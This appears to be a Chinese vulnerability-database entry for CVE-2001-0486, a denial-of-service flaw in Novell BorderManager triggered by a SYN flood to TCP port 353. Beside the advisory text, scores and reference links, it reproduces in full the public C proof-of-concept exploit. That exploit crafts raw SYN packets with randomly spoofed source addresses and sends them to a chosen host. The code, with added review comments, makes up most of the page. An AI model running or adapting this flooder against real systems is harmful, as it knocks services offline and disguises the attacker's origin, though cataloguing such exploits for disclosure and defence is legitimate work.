CVE-2001-0486
CVSS5.0
发布时间 :2001-07-02 00:00:00
修订时间 :2016-10-17 22:11:21

[原文]Remote attackers can cause a denial of service in Novell BorderManager 3.6 and earlier by sending a TCP SYN flood to port 353.


[CNNVD]Novell BorderManager漏洞(CNNVD-200107-013)

        Novell BorderManager 3.6及其早期版本存在拒绝服务漏洞。远程攻击者可通过向353端口发送TCP SYN flood(SYN洪水)造成拒绝服务。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0486
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0486
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-013
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2001-05/0000.html
(PATCH)  BUGTRAQ  20010501 Re: Proof of concept DoS against novell border manager enterprise edition 3.5
http://archives.neohapsis.com/archives/vuln-dev/2001-q2/0020.html
(VENDOR_ADVISORY)  VULN-DEV  20010402 (no subject)
http://marc.info/?l=bugtraq&m=98779821207867&w=2
(UNKNOWN)  BUGTRAQ  20010420 Novell BorderManager 3.5 VPN Denial of Service
http://marc.info/?l=bugtraq&m=98865027328391&w=2
(UNKNOWN)  BUGTRAQ  20010429 Proof of concept DoS against novell border manager enterprise
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2959062.htm
(VENDOR_ADVISORY)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2959062.htm
http://www.securityfocus.com/bid/2623
(VENDOR_ADVISORY)  BID  2623
http://xforce.iss.net/static/6429.php
(UNKNOWN)  XF  bordermanager-vpn-syn-dos(6429)

- 漏洞信息

Novell BorderManager漏洞
中危 未知
2001-07-02 00:00:00 2005-05-02 00:00:00
远程  
        Novell BorderManager 3.6及其早期版本存在拒绝服务漏洞。远程攻击者可通过向353端口发送TCP SYN flood(SYN洪水)造成拒绝服务。

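- 公告与补丁

        本页未收录公告或补丁的具体内容。厂商确认信息见上文“其它链接及资源”中标注为 CONFIRM 的 Novell 支持文档(2959062.htm);在确认修复版本之前,可考虑仅允许受信任的 VPN 对端访问 TCP 353 端口。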

- 漏洞信息 (264)

Novell BorderManager Enterprise Edition 3.5 Denial of Service Exploit (EDBID:264)
novell dos
2001-05-07 Verified
0 honoriak
/* 29.4.2001 honoriak@mail.ru
   Proof of concept DoS Novell BorderManager Enterprise Edition 3.5
   helisec
   DoSs are lame, i know, but boredom is ugly. DON'T ABUSE.
   greets: jimjones, doing, darkcode for his paper about raw sockets 
   and all helisec guys.
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <time.h>  
#include <sys/types.h>
#include <sys/stat.h> 
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>

#define __FAVOR_BSD
#include <netinet/tcp.h>

#define PORT 353 

 /*
  * TCP pseudo-header followed by a copy of the TCP header. packet() fills the
  * single global instance `pseudoh` and hands it to checksum(), so the
  * address, protocol and length fields are summed together with the header.
  * packet() sizes it as 12 + sizeof(struct tcphdr): the five leading fields
  * (4 + 4 + 1 + 1 + 2 bytes) are assumed to be laid out without padding.
  */
 
 struct pseudohdr {
         struct in_addr saddr;      /* source address used for the checksum */
         struct in_addr daddr;      /* destination address (the target) */
         u_char zero;               /* never assigned; left 0 by bzero() in packet() */
         u_char protocol;           /* packet() stores 6 here (TCP) */
         u_short len;               /* packet() stores htons(sizeof(struct tcphdr)) */
         struct tcphdr tcpheader;   /* copy of the TCP header being checksummed */
     }pseudoh;
                                    

/*
 * Look up `name` with gethostbyname() and return the first address of the
 * result as a raw in_addr value (copied unchanged from the hostent).
 * Returns 0 when the lookup fails; main() treats 0 as "could not resolve".
 */
unsigned long resolve(char *name)
{
	struct hostent *entry = gethostbyname(name);
	struct in_addr addr;

	if (entry == NULL) {
		return 0;
	}

	/* Copy h_length bytes of the first listed address into the in_addr. */
	memcpy((char *)&addr.s_addr, entry->h_addr, entry->h_length);
	return addr.s_addr;
}
               
 /* checksum ripped and modified by me */
 
/*
 * Add up `length` bytes starting at `data` as 16-bit words, fold the bits
 * above 16 back into the low 16 once, and return the bitwise complement
 * (truncated to u_short by the return type). packet() stores the result in
 * the TCP checksum field.
 *
 * data   - buffer to sum, read as u_short words
 * length - size of the buffer in bytes
 *
 * NOTE(review): `value` is declared without an initialiser, so the running
 * total starts from an indeterminate value (undefined behaviour in C).
 */
u_short
checksum (data, length)
	u_short *data;
	u_short length;
{

register long value;
u_short i;
    
      /* one iteration per complete 16-bit word */
      for (i = 0; i < (length >> 1); i++)
       value += data[i];
          
       /* odd length: one more word is read at index i and shifted left by 8 */
       if ((length & 1) == 1)
       value += (data[i] << 8);
                
       /* single fold of the carry bits into the low 16 bits */
       value = (value & 65535) + (value >> 16);
                  
       return (~value);
}
                    

/*
 * Build one IPv4 + TCP SYN datagram in a 40-byte stack buffer and send it
 * 260 times to `vic` over the raw socket `socket`, then close the socket.
 *
 * vic    - destination; sin_addr becomes the IP destination and sin_port the
 *          TCP destination port (main() sets it to htons(PORT), i.e. 353)
 * socket - raw socket descriptor opened by main(); closed before returning
 *
 * Exits the process with status -1 on the first sendto() failure.
 *
 * Notes for analysts reading this PoC:
 *  - The headers are filled in once, before the loop, so every datagram sent
 *    by one run is the same buffer.
 *  - The IP source address comes from rand(), not from the sending host, and
 *    no srand() call appears in this file.
 *  - Source port, sequence number and window are compile-time constants.
 *  - Only the initial SYN is emitted; no connection is ever completed, which
 *    matches the "TCP SYN flood to port 353" wording of the advisory.
 */
void packet(vic, socket) 
	struct sockaddr_in *vic;
	int socket;
 {
 
 int count;
 char buf[40];
                     
 /* both header pointers alias buf: IP header first, TCP header right after */
 struct ip *ipheader = (struct ip *)buf;
 struct tcphdr *tcpheader = (struct tcphdr *)(buf + sizeof(struct ip));
 
 bzero (&buf, (sizeof(struct ip) + sizeof(struct tcphdr)) );
 
 	/* IP header fields */
 	
 	ipheader->ip_v = IPVERSION;
 	ipheader->ip_hl = 5;               /* header length in 32-bit words, no options */
 	ipheader->ip_tos = htons(0);
 	ipheader->ip_len = htons(sizeof(buf));
 	ipheader->ip_id = rand() % 0xffff;
 	ipheader->ip_off = htons(0);
 	ipheader->ip_ttl = 0xff;  /* 0xff = 255 */
 	ipheader->ip_p = IPPROTO_TCP;
 	ipheader->ip_src.s_addr = rand();  /* source address is not the sender's own */
 	ipheader->ip_dst.s_addr = vic->sin_addr.s_addr;
 	ipheader->ip_sum = 0;
 	
 	/* TCP header fields */
 	
 	tcpheader->th_sport = 2424; /* constant, stored without htons() */
 	tcpheader->th_dport = vic->sin_port;
 	tcpheader->th_seq = htonl(0xF1C); /* constant */
 	tcpheader->th_ack = 0;
 	tcpheader->th_off = 5;             /* data offset in 32-bit words, no options */
 	tcpheader->th_flags = TH_SYN; /* SYN only: a connection request */
 	tcpheader->th_win = 4096;
 	tcpheader->th_sum = 0;   
 	

 /* fill the global pseudo-header, copy the TCP header in, then checksum both */
 bzero (&pseudoh, 12 + sizeof(struct tcphdr));
 pseudoh.saddr.s_addr = rand();
 pseudoh.daddr.s_addr = vic->sin_addr.s_addr;
 pseudoh.protocol = 6;
 pseudoh.len = htons (sizeof(struct tcphdr));
 memcpy((char *)&pseudoh.tcpheader, (char *)tcpheader, sizeof (struct tcphdr));
 tcpheader->th_sum = checksum((u_short *)&pseudoh, 12 + sizeof (struct tcphdr));
  
 /* sending packets, DON'T ABUSE! */
 /* NOTE(review): the send length is written with struct iphdr while the
    buffer was laid out with struct ip; presumably the same size - confirm */

for (count = 0; count < 260; count++) {
  if ( (sendto(socket, 
 	   buf, 
 	   (sizeof(struct iphdr) + sizeof(struct tcphdr)), 
 	   0, 
 	   (struct sockaddr *)vic, 
 	   sizeof(struct sockaddr_in))) < 0) {
 	   fprintf(stderr, "Error sending packets\n"); 
           exit(-1);
           }              
      }                              	                                                    
close (socket);
  }
 
/*
 * Print the tool banner and the expected command line to stderr, then
 * terminate the process with status 0. Does not return.
 */
void usage(char *proggy)
{
	fputs("DoS a Novell BorderManager Enterprise Edition 3.5\n", stderr);
	fputs("honoriak@mail.ru from helisec\n", stderr);
	fprintf(stderr, "Usage: %s host\n", proggy);
	exit(0);
}

/*
 * Entry point: takes one argument (dotted-quad address or host name),
 * resolves it, opens a raw socket and calls packet() once for port PORT.
 *
 * Exit status: 0 after packet() returns or after usage(); -1 when the host
 * cannot be resolved or the raw socket cannot be created.
 *
 * The final "DoS completed." message is printed unconditionally once
 * packet() returns; nothing here checks the state of the target.
 */
main(argc, argv) 
	int argc;
	char *argv[];
	
 {
  
  struct sockaddr_in h;
  int s0ck, uno = 1;
  
  if (argc < 2)
  	{
  	usage(argv[0]);   /* usage() exits, so control does not continue */
  	}
  	
  bzero(&h, sizeof(h)); 
  h.sin_family = AF_INET;   
  h.sin_port = htons(PORT); 

/* try the argument as a numeric IPv4 address first, then as a host name */
if ( (inet_pton(AF_INET, argv[1], &h.sin_addr)) <= 0)
	{
	h.sin_addr.s_addr = resolve(argv[1]);
	}
	
/* resolve() returns 0 on failure, so an all-zero address is treated as an error */
if (!h.sin_addr.s_addr) {
	fprintf(stderr, "Error resolving host\n");
	exit(-1);
	}
	
/* protocol 255 is the value of IPPROTO_RAW; per the message below, opening
   this socket needs root privileges */
if ((s0ck = socket(AF_INET, SOCK_RAW, 255)) < 0) {
        fprintf(stderr, "Error creating raw socket, root is needed\n");
        exit (-1);
        }

/* return value of setsockopt() is not checked */
setsockopt(s0ck, SOL_SOCKET, SO_BROADCAST, &uno, sizeof(uno));

packet(&h, s0ck);   /* packet() also closes s0ck */
fprintf(stderr, "DoS completed.\n");
exit(0);
}


// milw0rm.com [2001-05-07]
		

- 漏洞信息

1795
Novell BorderManager Port 353 SYN DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2001-04-20 Unknown
Unknown Unknown

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 
